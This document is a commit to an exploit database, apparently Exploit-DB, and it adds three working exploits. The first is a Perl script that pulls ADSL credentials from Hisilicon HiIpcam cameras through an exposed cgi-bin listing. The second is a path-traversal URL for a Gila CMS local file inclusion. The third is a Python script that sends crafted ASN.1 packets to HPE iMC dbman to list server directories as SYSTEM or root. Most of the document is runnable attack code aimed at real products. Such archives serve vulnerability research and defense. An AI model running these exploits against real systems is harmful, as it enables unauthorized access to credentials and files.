DB: 2019-09-24

3 changes to exploits/shellcodes Hisilicon HiIpcam V100R003 Remote ADSL - Credentials Disclosure HPE Intelligent Management Center < 7.3 E0506P09 - Information Disclosure Gila CMS < 1.11.1 - Local File Inclusion
2019-09-24 05:03:03 +00:00 · 2019-09-24 05:03:03 +00:00 · afd22dbcb0
commit afd22dbcb0
parent c1fba60b26
4 changed files with 223 additions and 0 deletions
--- a/exploits/hardware/remote/47405.pl
+++ b/exploits/hardware/remote/47405.pl
@ -0,0 +1,114 @@
+#!/usr/bin/perl -w
+#
+#  Hisilicon HiIpcam V100R003 Remote ADSL Credentials Disclosure
+#
+#  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
+#
+#
+#	#  [ 
+#	#  [ Hisilicon HiIpcam V100R003 Remote ADSL Credentials Disclosure
+#	#  [ =============================================================
+#	#  [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>
+#	#  [
+#	#  [  Disclaimer:
+#	#  [  This or previous programs are for Educational purpose
+#	#  [  ONLY. Do not use it without permission. The usual 
+#	#  [  disclaimer applies, especially the fact that Todor Donev
+#	#  [  is not liable for any damages caused by direct or 
+#	#  [  indirect use of the  information or functionality provided
+#	#  [  by these programs. The author or any Internet provider 
+#	#  [  bears NO responsibility for content or misuse of these 
+#	#  [  programs or any derivatives thereof. By using these programs 
+#	#  [  you accept the fact that any damage (dataloss, system crash, 
+#	#  [  system compromise, etc.) caused by the use  of these programs
+#	#  [  are not Todor Donev's responsibility.
+#	#  [   
+#	#  [ Use them at your own risk!
+#	#  [
+#	#  [ Initializing the browser
+#	#  [ Server: thttpd/2.25b 29dec2003
+#	#  [ The target is vulnerable
+#	#  [
+#	#  [ Directory Traversal
+#	#  [
+#	#  [ /cgi-bin/..
+#	#  [ /cgi-bin/adsl_init.cgi
+#	#  [ /cgi-bin/chkwifi.cgi
+#	#  [ /cgi-bin/ddns_start.cgi
+#	#  [ /cgi-bin/getadslattr.cgi
+#	#  [ /cgi-bin/getddnsattr.cgi
+#	#  [ /cgi-bin/getinetattr.cgi
+#	#  [ /cgi-bin/getinterip.cgi
+#	#  [ /cgi-bin/getnettype.cgi
+#	#  [ /cgi-bin/getupnp.cgi
+#	#  [ /cgi-bin/getwifi.cgi
+#	#  [ /cgi-bin/getwifiattr.cgi
+#	#  [ /cgi-bin/ptzctrldown.cgi
+#	#  [ /cgi-bin/ptzctrlleft.cgi
+#	#  [ /cgi-bin/ptzctrlright.cgi
+#	#  [ /cgi-bin/ptzctrlup.cgi
+#	#  [ /cgi-bin/ptzctrlzoomin.cgi
+#	#  [ /cgi-bin/ptzctrlzoomout.cgi
+#	#  [ /cgi-bin/ser.cgi
+#	#  [ /cgi-bin/setadslattr.cgi
+#	#  [ /cgi-bin/setddnsattr.cgi
+#	#  [ /cgi-bin/setinetattr.cgi
+#	#  [ /cgi-bin/setwifiattr.cgi
+#	#  [ /cgi-bin/testwifi.cgi
+#	#  [ /cgi-bin/upnp_start.cgi
+#	#  [ /cgi-bin/upnp_stop.cgi
+#	#  [ /cgi-bin/wifi_start.cgi
+#	#  [ /cgi-bin/wifi_stop.cgi
+#	#  [ 
+#	#  [ File Reading
+#	#  [
+#	#  [ var ip = "" ;
+#	#  [ var adslenable = "" ;
+#	#  [ var username = "hacker" ;
+#	#  [ var password = "133337" ;
+#	#  [ var dnsauto = "1" ;
+#	#  [ var dns1 = "8.8.8.8" ;
+#	#  [ var dns2 = "8.8.4.4" ;
+#
+# 
+use strict;
+use HTTP::Request;
+use LWP::UserAgent;
+use WWW::UserAgent::Random;
+use HTML::TreeBuilder;
+$| = 1;
+my $host = shift || 'https://192.168.1.1/'; # Full path url to the store
+print "\033[2J";    #clear the screen
+print "\033[0;0H"; #jump to 0,0
+
+my $banner =  "\x5b\x20\x0a\x5b\x20\x48\x69\x73\x69\x6c\x69\x63\x6f\x6e\x20\x48\x69\x49\x70\x63\x61\x6d\x20\x56\x31\x30\x30\x52\x30\x30\x33\x20\x52\x65\x6d\x6f\x74\x65\x20\x41\x44\x53\x4c\x20\x43\x72\x65\x64\x65\x6e\x74\x69\x61\x6c\x73\x20\x44\x69\x73\x63\x6c\x6f\x73\x75\x72\x65\x0a\x5b\x20\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x0a\x5b\x20\x45\x78\x70\x6c\x6f\x69\x74\x20\x41\x75\x74\x68\x6f\x72\x3a\x20\x54\x6f\x64\x6f\x72\x20\x44\x6f\x6e\x65\x76\x20\x32\x30\x31\x39\x20\x3c\x74\x6f\x64\x6f\x72\x2e\x64\x6f\x6e\x65\x76\x40\x67\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x3e\x0a\x5b\x0a\x5b\x20\x20\x44\x69\x73\x63\x6c\x61\x69\x6d\x65\x72\x3a\x0a\x5b\x20\x20\x54\x68\x69\x73\x20\x6f\x72\x20\x70\x72\x65\x76\x69\x6f\x75\x73\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x20\x61\x72\x65\x20\x66\x6f\x72\x20\x45\x64\x75\x63\x61\x74\x69\x6f\x6e\x61\x6c\x20\x70\x75\x72\x70\x6f\x73\x65\x0a\x5b\x20\x20\x4f\x4e\x4c\x59\x2e\x20\x44\x6f\x20\x6e\x6f\x74\x20\x75\x73\x65\x20\x69\x74\x20\x77\x69\x74\x68\x6f\x75\x74\x20\x70\x65\x72\x6d\x69\x73\x73\x69\x6f\x6e\x2e\x20\x54\x68\x65\x20\x75\x73\x75\x61\x6c\x20\x0a\x5b\x20\x20\x64\x69\x73\x63\x6c\x61\x69\x6d\x65\x72\x20\x61\x70\x70\x6c\x69\x65\x73\x2c\x20\x65\x73\x70\x65\x63\x69\x61\x6c\x6c\x79\x20\x74\x68\x65\x20\x66\x61\x63\x74\x20\x74\x68\x61\x74\x20\x54\x6f\x64\x6f\x72\x20\x44\x6f\x6e\x65\x76\x0a\x5b\x20\x20\x69\x73\x20\x6e\x6f\x74\x20\x6c\x69\x61\x62\x6c\x65\x20\x66\x6f\x72\x20\x61\x6e\x79\x20\x64\x61\x6d\x61\x67\x65\x73\x20\x63\x61\x75\x73\x65\x64\x20\x62\x79\x20\x64\x69\x72\x65\x63\x74\x20\x6f\x72\x20\x0a\x5b\x20\x20\x69\x6e\x64\x69\x72\x65\x63\x74\x20\x75\x73\x65\x20\x6f\x66\x20\x74\x68\x65\x20\x20\x69\x6e\x66\x6f\x72\x6d\x61\x74\x69\x6f\x6e\x20\x6f\x72\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x61\x6c\x69\x74\x79\x20\x70\x72\x6f\x76\x69\x64\x65\x64\x0a\x5b\x20\x20\x62\x79\x20\x74\x68\x65\x73\x65\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x2e\x20\x54\x68\x65\x20\x61\x75\x74\x68\x6f\x72\x20\x6f\x72\x20\x61\x6e\x79\x20\x49\x6e\x74\x65\x72\x6e\x65\x74\x20\x70\x72\x6f\x76\x69\x64\x65\x72\x20\x0a\x5b\x20\x20\x62\x65\x61\x72\x73\x20\x4e\x4f\x20\x72\x65\x73\x70\x6f\x6e\x73\x69\x62\x69\x6c\x69\x74\x79\x20\x66\x6f\x72\x20\x63\x6f\x6e\x74\x65\x6e\x74\x20\x6f\x72\x20\x6d\x69\x73\x75\x73\x65\x20\x6f\x66\x20\x74\x68\x65\x73\x65\x20\x0a\x5b\x20\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x20\x6f\x72\x20\x61\x6e\x79\x20\x64\x65\x72\x69\x76\x61\x74\x69\x76\x65\x73\x20\x74\x68\x65\x72\x65\x6f\x66\x2e\x20\x42\x79\x20\x75\x73\x69\x6e\x67\x20\x74\x68\x65\x73\x65\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x20\x0a\x5b\x20\x20\x79\x6f\x75\x20\x61\x63\x63\x65\x70\x74\x20\x74\x68\x65\x20\x66\x61\x63\x74\x20\x74\x68\x61\x74\x20\x61\x6e\x79\x20\x64\x61\x6d\x61\x67\x65\x20\x28\x64\x61\x74\x61\x6c\x6f\x73\x73\x2c\x20\x73\x79\x73\x74\x65\x6d\x20\x63\x72\x61\x73\x68\x2c\x20\x0a\x5b\x20\x20\x73\x79\x73\x74\x65\x6d\x20\x63\x6f\x6d\x70\x72\x6f\x6d\x69\x73\x65\x2c\x20\x65\x74\x63\x2e\x29\x20\x63\x61\x75\x73\x65\x64\x20\x62\x79\x20\x74\x68\x65\x20\x75\x73\x65\x20\x20\x6f\x66\x20\x74\x68\x65\x73\x65\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x0a\x5b\x20\x20\x61\x72\x65\x20\x6e\x6f\x74\x20\x54\x6f\x64\x6f\x72\x20\x44\x6f\x6e\x65\x76\x27\x73\x20\x72\x65\x73\x70\x6f\x6e\x73\x69\x62\x69\x6c\x69\x74\x79\x2e\x0a\x5b\x20\x20\x20\x0a\x5b\x20\x55\x73\x65\x20\x74\x68\x65\x6d\x20\x61\x74\x20\x79\x6f\x75\x72\x20\x6f\x77\x6e\x20\x72\x69\x73\x6b\x21\x0a\x5b\x0a";
+
+print $banner;
+
+print "[ e.g. perl $0 https://target:port/\n" and exit if ($host !~ m/^http/);
+print "[ Initializing the browser\n";
+my $user_agent = rand_ua("browsers");
+my $browser  = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
+   $browser->timeout(30);
+   $browser->agent($user_agent);
+my $target = $host."/cgi-bin/";
+my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);                      
+my $response = $browser->request($request) or die "[ Exploit Failed: $!";
+print "[ 401 Unauthorized!\n" and exit if ($response->code eq '401');
+print "[ Server: ", $response->header('Server'), "\n";
+if (defined ($response->as_string()) && ($response->as_string() =~ m/<H2>Index of \/cgi-bin\/<\/H2>/)){
+    print "[ The target is vulnerable\n";
+    print "[\n[ Directory Traversal\n";
+    my $tree = HTML::TreeBuilder->new_from_content($response->as_string());
+    my @files = $tree->look_down(_tag => 'a');
+    print "[ ", $_->attr('href'), "\n" for @files;
+    my $target = $host."/cgi-bin/getadslattr.cgi";
+    my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);
+    my $response = $browser->request($request) or die "[ Exploit Failed: $!";
+    print "[\n[ File Reading\n";
+    print "[ ", $_, "\n" for split(/\n/,$response->content());
+
+} else { 
+        print "[ Exploit failed! The target isn't vulnerable\n";
+        exit;
+}
--- a/exploits/multiple/webapps/47407.txt
+++ b/exploits/multiple/webapps/47407.txt
@ -0,0 +1,18 @@
+# Exploit Title: Authenticated Local File Inclusion(LFI) in GilaCMS
+# Google Dork: N/A
+# Date: 04-08-2019
+# Exploit Author: Sainadh Jamalpur
+# Vendor Homepage: https://github.com/GilaCMS/gila
+# Software Link: https://github.com/GilaCMS/gila
+# Version: 1.10.9
+# Tested on: XAMPP version 3.2.2 in Windows 10 64bit,
+# CVE : CVE-2019-16679
+
+*********** *Steps to reproduce the Vulnerability* *************
+
+Login into the application as an admin user or equivalent user and go the
+below link
+
+http://localhost/gilacms/admin/fm/?f=src../../../../../../../../../WINDOWS/system32/drivers/etc/hosts
+
+################################################################
--- a/exploits/watchos/remote/47408.py
+++ b/exploits/watchos/remote/47408.py
@ -0,0 +1,88 @@
+#!/opt/local/bin/python2.7
+
+# Exploit Title: HPE Intelligent Management Center dbman Command 10001 Information Disclosure
+# Date: 22-09-2019
+# Exploit Author: Rishabh Sharma (Linkedin: rishabh2241991)
+# Vendor Homepage: www.hpe.com
+# Software Link: https://h10145.www1.hpe.com/Downloads/DownloadSoftware.aspx?SoftwareReleaseUId=16759&ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535&SaidNumber=
+# Tested on Version: iMC_PLAT_7.1_E0302_Standard_Windows and iMC_PLAT_7.2_E0403_Std_Win
+# Tested on: Windows 7
+# CVE : CVE-2019-5392
+# Conversion of Nessus Plugin to Python Exploit
+# Nessus Plugin Name: hp_imc_dbman_cmd_10001_info_disclosure.nasl
+# Description: This vulnerability allow remote attacker to view the contents of arbitrary directories under the security context of the SYSTEM or root user.
+# See Also: https://www.tenable.com/plugins/nessus/118038
+
+from pyasn1.type.univ import *
+from pyasn1.type.namedtype import *
+from pyasn1.codec.ber import encoder
+import struct
+import binascii
+import socket, sys
+import sys
+import re
+
+if len(sys.argv) != 4:
+    print "USAGE: python %s <ip> <port> <directory>" % (sys.argv[0])
+    sys.exit(1)
+else:
+    ip = sys.argv[1]
+    port = int(sys.argv[2]) # Default Port 2810
+    directory = sys.argv[3]
+    payload = directory.replace("\\","\\\\") 
+    opcode = 10001
+
+try:
+    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    print "Socket Created.."
+except socket.error:
+	print 'Failed to create socket'
+	sys.exit()
+victim_address = (ip,port)
+print('connecting to {} port {}'.format(*victim_address))
+sock.connect((ip, port))
+
+class DbmanMsg(Sequence):
+    componentType = NamedTypes(
+        NamedType('flag', Integer()),
+        NamedType('dir', OctetString())
+    )
+
+data = DbmanMsg()
+data['flag'] = 1
+data['dir'] = payload
+encodeddata = encoder.encode(data, defMode=False)
+dataLen = len(encodeddata)
+values = (opcode, dataLen, encodeddata)
+s = struct.Struct(">ii%ds" % dataLen)
+packed_data = s.pack(*values)
+print 'Format string  :', s.format
+print 'Uses           :',s.size, 'bytes'
+print 'Packed Value   :', binascii.hexlify(packed_data)
+print '\n'
+print 'Sending Payload...'
+sock.send(packed_data)
+BUFF_SIZE = 4000
+res = sock.recv(BUFF_SIZE)
+rec =  len(res)
+if (rec == 0):
+	print "No data in the directory"
+else:
+        print "Data Recived: "+str(rec)
+	a = repr(res)
+	b = a
+	b = re.sub(r'(x\d\d)', '', b)
+	b = re.sub(r'(\\x[\d].)', '', b)
+	b = re.sub(r'(\\x..)', '', b)
+	replacestring = ['"','\\n','\\r','\\t','0']
+	print "Data in "+payload+" Directory: \n"
+	for r in replacestring:
+		b = b.replace(r,'')
+	b = b.replace("'","")
+	#print b #Remove '#' if output results is not proper
+	matches = re.finditer(r"([\\]*)([.[a-zA-Z\d\s]*)", b, re.MULTILINE)
+	for matchNum, match in enumerate(matches, start=1):
+                
+		print match.group(2)
+print "Done..."
+sock.close()
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -17674,6 +17674,8 @@ id,file,description,date,author,type,platform,port
 47375,exploits/linux/remote/47375.rb,"LibreNMS - Collectd Command Injection (Metasploit)",2019-09-10,Metasploit,remote,linux,
 47376,exploits/php/remote/47376.rb,"October CMS - Upload Protection Bypass Code Execution (Metasploit)",2019-09-10,Metasploit,remote,php,
 47390,exploits/hardware/remote/47390.txt,"Inteno IOPSYS Gateway - Improper Access Restrictions",2019-09-16,"Gerard Fuguet",remote,hardware,
+47405,exploits/hardware/remote/47405.pl,"Hisilicon HiIpcam V100R003 Remote ADSL - Credentials Disclosure",2019-09-23,"Todor Donev",remote,hardware,
+47408,exploits/watchos/remote/47408.py,"HPE Intelligent Management Center < 7.3 E0506P09 - Information Disclosure",2019-09-23,"Lazy Hacker",remote,watchos,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -41746,3 +41748,4 @@ id,file,description,date,author,type,platform,port
 47401,exploits/php/webapps/47401.txt,"DIGIT CENTRIS 4 ERP - 'datum1' SQL Injection",2019-09-19,n1x_,webapps,php,
 47402,exploits/php/webapps/47402.txt,"GOautodial 4.0 - 'CreateEvent' Persistent Cross-Site Scripting",2019-09-19,cakes,webapps,php,
 47403,exploits/php/webapps/47403.html,"LayerBB < 1.1.4 - Cross-Site Request Forgery",2019-09-20,0xB9,webapps,php,
+47407,exploits/multiple/webapps/47407.txt,"Gila CMS < 1.11.1 - Local File Inclusion",2019-09-23,"Sainadh Jamalpur",webapps,multiple,